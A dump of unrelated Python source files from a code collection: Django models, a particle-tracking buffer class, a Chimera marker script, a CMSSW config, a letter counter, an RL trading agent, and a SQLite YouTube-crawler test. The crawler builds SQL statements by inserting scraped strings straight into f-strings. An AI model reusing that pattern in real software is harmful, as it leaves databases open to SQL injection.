] | permissive | loganmurphy/unit-integration-tests | 1c973f3c2955d7af6a1955e48f61d6e5e1ed700a | 3af12e3f956a501422bc6686b3deb0bc815a0610 | refs/heads/master | 2021-08-30T03:41:40.394459 | 2017-12-15T22:34:30 | 2017-12-15T22:34:30 | 114,272,900 | 0 | 0 | null | 2017-12-14T16:27:54 | 2017-12-14T16:27:54 | null | UTF-8 | Python | false | false | 651 | py | from django.db import models
from django.conf import settings
class Padawan(models.Model):
userID = models.CharField(max_length=250, unique=True)
    def __str__(self):
return self.userID
class YodaPhrase(models.Model):
phrase = models.TextField(null=True)
translation = models.TextField(null=True)
url = models.CharField(max_length=250, blank=True, null=True)
jedi = models.BooleanField(default=False)
sith = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
padawan = models.ForeignKey(Padawan, on_delete=models.CASCADE)
    def __str__(self):
return self.phrase
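# Hypothetical ORM usage (assumes migrations have been applied):
#   master = Padawan.objects.create(userID="U123")
#   YodaPhrase.objects.create(phrase="Do or do not.", translation="...", padawan=master)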
| [
"[email protected]"
] | |
73737bf81e75478db35f9ca61995da66cdf0d9c2 | 769db2120993c3d02531c41bb3daae976647a28b | /simpletrack/particles.py | 951a9f123031237e14776d02e4a20170cff9e039 | [] | no_license | giadarol/simpletrack | 3fbffee63bfa8b0f3172dd7b678c99bdc7349b1f | fb39d2726af4a4092100215664a11a2cde2639be | refs/heads/master | 2020-04-06T23:23:42.258911 | 2018-11-16T14:36:40 | 2018-11-16T14:36:40 | 157,867,458 | 0 | 0 | null | 2018-11-16T12:54:27 | 2018-11-16T12:54:27 | null | UTF-8 | Python | false | false | 5,529 | py | import numpy as np
from cobjects import CBuffer, CObject, CField
## chi = q/q_0 m_0/m
## rmass = m_0/m
## rchange = q/q_0
## px = P/P0 m_0 / m
class Particles(CObject):
pmass=938.272046e6
_typeid=0
def _set_p0c(self):
energy0=np.sqrt(self.p0c**2+self.mass0**2)
self.beta0=self.p0c/energy0
def _set_delta(self):
rep=np.sqrt(self.delta**2+2*self.delta+1/self.beta0**2)
irpp=1+self.delta
self.rpp=1/irpp
beta=irpp/rep
self.rvv=beta/self.beta0
# memory layout
nparticles=CField(0,'int64',const=True)
mass0 =CField( 1,'float64',length='nparticles',default=pmass)
p0c =CField( 2,'float64',length='nparticles',default=0,setter=_set_p0c)
beta0 =CField( 3,'float64',length='nparticles',default=1)
charge0=CField( 4,'float64',length='nparticles',default=1)
#s
x =CField( 5,'float64',length='nparticles',default=0)
px =CField( 6,'float64',length='nparticles',default=0)
y =CField( 7,'float64',length='nparticles',default=0)
py =CField( 8,'float64',length='nparticles',default=0)
zeta =CField( 9,'float64',length='nparticles',default=0)
delta =CField(10,'float64',length='nparticles',default=0,setter=_set_delta)
    #psigma
rpp =CField(11,'float64',length='nparticles',default=1)
rvv =CField(12,'float64',length='nparticles',default=1)
rmass =CField(13,'float64',length='nparticles',default=1)
rcharge=CField(14,'float64',length='nparticles',default=1)
chi =CField(15,'float64',length='nparticles',default=1)
partid =CField(16,'int64',length='nparticles',default=0)
turns =CField(17,'int64',length='nparticles',default=0)
islost =CField(18,'int64',length='nparticles',default=0)
#elemid
def __init__(self,cbuffer=None,nparticles=0, partid=None,**nargs):
if partid is None:
partid=np.arange(nparticles)
CObject.__init__(self,cbuffer=cbuffer,
nparticles=nparticles,
partid=partid,
**nargs)
@classmethod
def _gen_opencl_copyparticle(cls):
idx=cls.mass0.index
types={'float64':'f64','int64':'i64'}
out=["""void copy_particle_from(__global slot_t *particles_p,
size_t ipart,
Particle *particle){
size_t npart =particles_p[0].i64;"""]
for name,field in cls.get_fields():
if field.index>=idx:
ctype=f"{types[field.ftype]}"
data=f"particles_p[{idx}+{field.index-idx}*npart+ipart]"
out.append(f" particle->{name:7} ={data}.{ctype} ;")
out.append('};')
print('\n'.join(out))
out=["""void copy_particle_to(__global slot_t *particles_p,
size_t ipart,
Particle *particle){
size_t npart =particles_p[0].i64;"""]
for name,field in cls.get_fields():
if field.index>=idx:
ctype=f"{types[field.ftype]}"
data=f"particles_p[{idx}+{field.index-idx}*npart+ipart]"
out.append(f" {data}.{ctype}= particle->{name:7};")
out.append('};')
print('\n'.join(out))
@classmethod
def _gen_cpu_copyparticle(cls):
types={'float64':'f64','int64':'i64'}
out=["""void copy_single_particle_to(slot_t * restrict part_dst_p,
size_t ipart_dst,
                            slot_t * restrict part_src_p,
size_t ipart_src){
size_t npart_dst =part_dst_p[0].i64;
size_t npart_src =part_src_p[0].i64;"""]
idx=cls.mass0.index
for name,field in cls.get_fields():
if field.index>=idx:
#ctype=f"{types[field.ftype]}"
dst=f"part_dst_p[{idx}+{field.index-idx}*npart_dst+ipart_dst]"
src=f"part_src_p[{idx}+{field.index-idx}*npart_src+ipart_src]"
out.append(f" {dst} =")
out.append(f" {src} ;")
out.append('};')
print('\n'.join(out))
@classmethod
def _gen_opencl_particle_type(cls):
idx=cls.mass0.index
types={'float64':'double','int64':'long'}
out=["typedef struct {"]
for name,field in cls.get_fields():
if field.index>=idx:
out.append(f" {types[field.ftype]} {name};")
out.append('} Particle;')
out.append("\n#define PARTICLE_GET(p,name) p.name")
print('\n'.join(out))
@classmethod
def _gen_common_particle_slots(cls):
idx=cls.mass0.index
types={'float64':'REAL','int64':'INT'}
out=['#define PARTICLE_SLOTS \\']
for name,field in cls.get_fields():
if field.index>=idx:
ctype=types[field.ftype]
cdef=f" {ctype}({name});"
out.append(f" {cdef:23}\\")
print('\n'.join(out))
@classmethod
def _gen_common_particle_accessors(cls):
idx=cls.mass0.index
out=[]
for name,field in cls.get_fields():
if field.index>=idx:
fdef=f"#define {name.upper()}(p)"
out.append(f"{fdef:18} PARTICLE_GET(p,{name})")
print('\n'.join(out))
class ParticlesSet(object):
def __init__(self):
self.cbuffer=CBuffer()
self.particles=[]
def Particles(self,**nargs):
particles=Particles(cbuffer=self.cbuffer,**nargs)
self.particles.append(particles)
return particles
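# Minimal usage sketch (values are illustrative):
#   pset = ParticlesSet()
#   p = pset.Particles(nparticles=10, p0c=6.5e12)  # the p0c setter also fills beta0
#   p.delta = 1e-4                                 # the delta setter updates rpp/rvv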
| [
"[email protected]"
] | |
f4c16df479c41d875d6923316633e762a7e5f3e6 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_25586.py | 426c1d73a6457108e12822fce4bf72e82f3f2a37 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,844 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((501.532, 478.427, 560.203), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((444.882, 505.913, 539.923), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((377.42, 530.991, 500.137), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((428.595, 403.803, 470.526), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((228.378, 631.865, 420.858), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((469.862, 500.665, 534.635), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((470.928, 500.729, 534.488), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((477.695, 484.859, 512.821), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((504.745, 480.911, 507.128), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((528.287, 488.878, 493.665), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((549.208, 504.897, 483.271), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((532.188, 522.11, 469.412), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((481.641, 496.449, 560.252), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((586.291, 552.006, 383.014), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((405.777, 641.567, 367.333), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((405.777, 641.567, 367.333), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((418.803, 631.628, 390.651), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((430.659, 619.791, 414.057), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((441.889, 604.958, 436.027), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((450.621, 588.404, 457.689), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((452.564, 570.965, 480.262), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((448.285, 552.608, 502.006), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((503.896, 596.613, 254.276), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((389.623, 500.887, 750.203), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((406.11, 566.292, 511.876), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((406.11, 566.292, 511.876), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((401.349, 550.249, 488.024), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((394.94, 525.327, 473.63), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((383.151, 500.87, 485.36), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((469.104, 432.083, 545.69), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((288.584, 560.938, 430.957), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((446.828, 478.588, 531.305), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((446.806, 478.412, 531.239), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((450.168, 479.07, 559.487), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((478.828, 480.026, 559.693), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((501.073, 495.177, 549.243), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((519.89, 509.002, 532.431), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((532.184, 527.196, 514.089), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((533.233, 545.422, 492.177), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((476.078, 573.433, 549.187), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((588.446, 515.949, 430.702), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((436.493, 558.369, 567.586), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((427.304, 539.16, 552.213), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((405.938, 497.581, 518.287), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((384.965, 456.044, 484.45), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((409.45, 408.08, 544.619), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((337.482, 436.849, 393.392), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((445.821, 506.296, 618.963), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((431.934, 504.532, 594.169), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((420.549, 498.013, 568.796), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((397.345, 507.847, 554.421), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((372.335, 517.103, 542.227), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((346.232, 526.092, 531.601), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((422.678, 513.57, 549.038), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((266.561, 540.501, 512.139), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
7cc18262aae9e23485ef02cce277089efcc19d95 | 72196ee3747efd8c3b82e4f32987b6e49f7b7deb | /test.py | 0db252b10609d302180d56b165870e79726b10c9 | [
"MIT"
] | permissive | easthobb/Youtube-Crawler | 2a76e0955faa3f070a134e415c156fc27bca8d65 | e85b96110a5f1196dacf71ed11c15f65c757cf05 | refs/heads/main | 2023-02-28T02:27:20.239110 | 2021-01-31T06:00:54 | 2021-01-31T06:00:54 | 330,909,307 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,478 | py | import sqlite3
import time
def db_manage_channel_info(c_list):
channel_id = c_list[0]
channel_name = c_list[1]
subscribe_count = int(c_list[2])
channel_description = c_list[3]
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("connect")
        # Query the DB for existing channel ids
cur.execute(f"SELECT channel_id from channel_info;")
db_list = cur.fetchall()
db_channel_id_list = []
for element in list(map(list, db_list)):
db_channel_id_list.append(element[0])
print("show")
        # Channel already registered in the DB
if channel_id in db_channel_id_list:
# update channel_info set channel_name = "LAS", subscribe_count=1500, channel_description="TEST" where channel_id = "UCsU-I-vHLiaMfV_ceaYz5rQ";
cur.execute(
f"update channel_info set channel_name = \"{channel_name}\", subscribe_count={subscribe_count}, channel_description=\"{channel_description}\" where channel_id = \"{channel_id}\";")
else:
cur.execute("INSERT INTO channel_info VALUES(?,?,?,?)", c_list)
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
print(db_channel_id_list)
def db_manage_channel_upload(video_info_list):
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("DB connect...")
        # Fetch every video_id already present in the table at once
cur.execute("SELECT video_id from channel_upload;")
db_list = cur.fetchall()
db_video_id_list = []
        for element in list(map(list, db_list)): # list of tuples -> list of lists
db_video_id_list.append(element[0])
print("GET channel_upload ...")
        # Loop over each video -> branch into update or insert
for video_info in video_info_list:
            # Map the info fields of each individual video
            video_id = video_info[0] # video_id used for lookup : KEY
            channel_id = video_info[2] # channel id
            pub_time = video_info[3] # video upload time
            description = video_info[4] # video description
            thumbnail_URL = video_info[8] # video thumbnail url
            video_URL = video_info[9] # video watch url
if video_id in db_video_id_list:
# update - 채널 id & 영상 id 안바꿈
cur.execute(f'''
update channel_upload set
pub_time = "{pub_time}",
description = "{description}",
thumbnail_URL = "{thumbnail_URL}",
video_URL = "{video_URL}"
where video_id = "{video_id}";
''')
print(video_id, "is updated")
else:
print("pass")
                # insert - insert everything as a new row
cur.execute(f'''
insert into channel_upload values("{video_id}","{channel_id}","{pub_time}","{description}","{thumbnail_URL}","{video_URL}");''')
print("pass")
print(video_id, "is inserted")
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
def db_manage_channel_monthly_update_videos(video_info_list):
    # Check whether the monthly table exists - the original plan was one table per month, but for now everything is loaded into a single table....
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("DB connect...")
        # Fetch every video_id already present in the table at once
cur.execute("SELECT video_id from monthly_update_videos;")
db_list = cur.fetchall()
db_video_id_list = []
        for element in list(map(list, db_list)): # list of tuples -> list of lists
db_video_id_list.append(element[0])
print("GET monthly_upload_video ...")
print(db_video_id_list)
        # Loop over each video -> branch into update or insert
for video_info in video_info_list:
            # Map the info fields of each individual video
            video_id = video_info[0] # video_id used for lookup : KEY
            views = int(video_info[5]) # view count
            likes = int(video_info[6]) # video like count
            comments = int(video_info[7]) # video comment count
            upload = video_info[3].split("T")[0] # video upload date
print(video_id,views,likes,comments,upload)
if video_id in db_video_id_list:
                # update - channel id unchanged
cur.execute(f'''
update monthly_update_videos set
views = "{views}",
likes = "{likes}",
comments = "{comments}",
upload = "{upload}"
where video_id = "{video_id}";
''')
print(video_id, "is updated")
else:
print("pass")
                # insert - insert everything as a new row
cur.execute(f'''
insert into monthly_update_videos values("{video_id}","{views}","{likes}","{comments}","{upload}");
''')
print(video_id, "is inserted")
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
if __name__ == "__main__":
# [video_id0,title,channel_id,pub_time,description,views,likes,comments,thumbnail_URL,video_URL]
channel_info_list = ['UCsU-I-vHLiaMfV_ceaYz5rQ', 'JTBC News', '1500000','관점과 분석이 있는 뉴스, JTBC 뉴스 공식 유튜브 채널입니다. \n\nWelcome to the official JTBC News Channel.\n\nEasy and Fun news channel 15! You will find the faster and more accurate news on JTBC.']
video_info_list = [['zPFTNSH1Gns', "갸갸갸?", 'UCsU-I-vHLiaMfV_ceaYz5rQ', '2021-01-23T03:00:27Z', 'rirriririririri', '710393', '6424', '4628', 'https://i.ytimg.com/vi/zPFTNSH1Gns/default.jpg', 'https://www.youtube.com/watch?v=zPFTNSH1Gns']]
db_manage_channel_info(channel_info_list)
time.sleep(1)
db_manage_channel_upload(video_info_list)
time.sleep(2)
db_manage_channel_monthly_update_videos(video_info_list)
| [
"[email protected]"
] | |
4349b5d95998621201cd804c6a641f363832b3e0 | 949633cd7f09a68b19304af14562b29514261ecc | /Geometry/TrackerGeometryBuilder/test/trackerParameters_cfg.py | 1263a0ad400017383ae646c097899c7b6f6945f5 | [] | permissive | gsfs/cmssw | eabfe97b0594287ce25556e6b091956b72baad72 | fdbcb59c16cafd2a9b56177064bc0b6b93cc51dc | refs/heads/CMSSW_8_0_X | 2021-01-21T23:41:29.108786 | 2019-04-11T16:11:14 | 2019-04-11T16:11:14 | 226,406,411 | 0 | 0 | Apache-2.0 | 2019-12-06T20:39:25 | 2019-12-06T20:39:24 | null | UTF-8 | Python | false | false | 921 | py | import FWCore.ParameterSet.Config as cms
from Configuration.AlCa.autoCond import autoCond
process = cms.Process("TrackerParametersTest")
process.load('Configuration.StandardSequences.GeometryDB_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.GlobalTag.globaltag = autoCond['run1_mc']
process.GlobalTag.toGet = cms.VPSet(cms.PSet(record = cms.string('PTrackerParametersRcd'),
tag = cms.string('TK_Parameters_Test02'),
connect = cms.untracked.string("sqlite_file:./myfile.db")
)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.test = cms.EDAnalyzer("TrackerParametersAnalyzer")
process.p1 = cms.Path(process.test)
| [
"[email protected]"
] | |
4b66cab70207121bd13efa0b75a852e3c4c178fe | 597c4f48332251552a602122bb3d325bc43a9d7f | /chapter02_hard_to_think/06_how_many_alphabets/12_how_many_alphabet_list.py | f4cc76277009cab92c5cd3074adf8c9f701d3715 | [] | no_license | Kyeongrok/python_algorithm | 46de1909befc7b17766a57090a7036886361fd06 | f0cdc221d7908f26572ae67b5c95b12ade007ccd | refs/heads/master | 2023-07-11T03:23:05.782478 | 2023-06-22T06:32:31 | 2023-06-22T06:32:31 | 147,303,654 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | string = 'out of sight, out of mind'
count_each = [0] * 26
for char in string:
    if char.isalpha():
        count_each[ord(char) - 97] += 1
print(count_each) | [
"[email protected]"
] | |
09da4ffd3e4afccd056d4ef08fddfe12dfa6ea68 | 678c928458276bb07d2af4e61056a5eb8ea2a624 | /agent.py | 229d700249a46d0b905c3cb3b3706d2008f1bd31 | [] | no_license | amitvpatel06/Crypto-RL-Kraken | cb68a9fb67cc97136618dc675a91f495e99b6021 | f4865ece93e51320e4b9eab8e050ec3498cd78bb | refs/heads/master | 2021-07-09T15:56:54.798756 | 2017-10-10T16:16:24 | 2017-10-10T16:16:24 | 96,155,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,836 | py | from environment import *
from collections import defaultdict
from Q import *
from Qfunction_approx import *
import csv # for reading
import sys
import numpy as np
import math
import multiprocess # for multithreading
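# Buffer keeps a sliding window of the last `look_back` values of one market
# feature, tracking the window min/max plus a separate rolling sum, and
# get_zone() discretizes a value into `divs` buckets over that min/max range
# (0 below the window minimum, `divs` above its maximum).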
class Buffer:
def __init__(self, look_back, rolling_window=150):
self.history = []
self.rolling_window = rolling_window
self.summands = []
self.max = -999999999999
self.min = 999999999999
self.sum = 0
self.look_back = look_back
def update_rolling_sum(self, next_value):
self.summands.append(next_value)
self.sum += next_value
if len(self.summands) > self.rolling_window :
self.sum -= self.summands[0]
self.summands.pop(0)
def buffer_add(self, addition):
self.curr = addition
self.history.append(addition)
if len(self.history) > self.look_back:
self.history.pop(0)
self.max = addition if max(self.history) < addition else max(self.history)
self.min = addition if min(self.history) > addition else min(self.history)
    def get_zone(self, target, divs):
        # Guard against a zero-width window (all values equal) before dividing.
        if self.max == self.min:
            return 0
        if target < self.min:
            return 0
        elif target > self.max:
            return divs
        else:
            return ((target - self.min) // ((self.max - self.min)/(divs - 1)) + 1)
def generate_state(market, divs):
state = {}
state['T'] = market['T']
state['I'] = market['I']
state['Spread'] = market['Spreads'].get_zone(market['Spreads'].curr, divs)
state['Misbalance'] = market['Misbalances'].get_zone(market['Misbalances'].curr, divs)
state['RollingVol'] = market['RollingVol'].get_zone(market['RollingVol'].curr, divs)
state['RollingSignedVol'] = market['RollingSignedVol'].get_zone(market['RollingSignedVol'].curr, divs)
return state
def update_market(market):
diff, net_vol, total_vol = market['book'].ob_diff(market['nextbook'])
market['currstate'].apply_diff(diff)
market['Spreads'].buffer_add(market['currstate'].get_spread())
market['Misbalances'].buffer_add(market['currstate'].get_misbalance())
market['RollingSignedVol'].update_rolling_sum(net_vol)
market['RollingSignedVol'].buffer_add(market['RollingSignedVol'].sum)
market['RollingVol'].update_rolling_sum(total_vol)
market['RollingVol'].buffer_add(market['RollingVol'].sum)
market['book'] = market['nextbook']
def generate_data(env, market, start, end):
market['currstate'] = env.get_book(start)
market['book'] = env.get_book(start)
for idx in range(start + 1, end + 1):
market['nextbook'] = env.get_book(idx)
update_market(market)
def reset_market(look_back, rolling_window):
market = {
'I': 0,
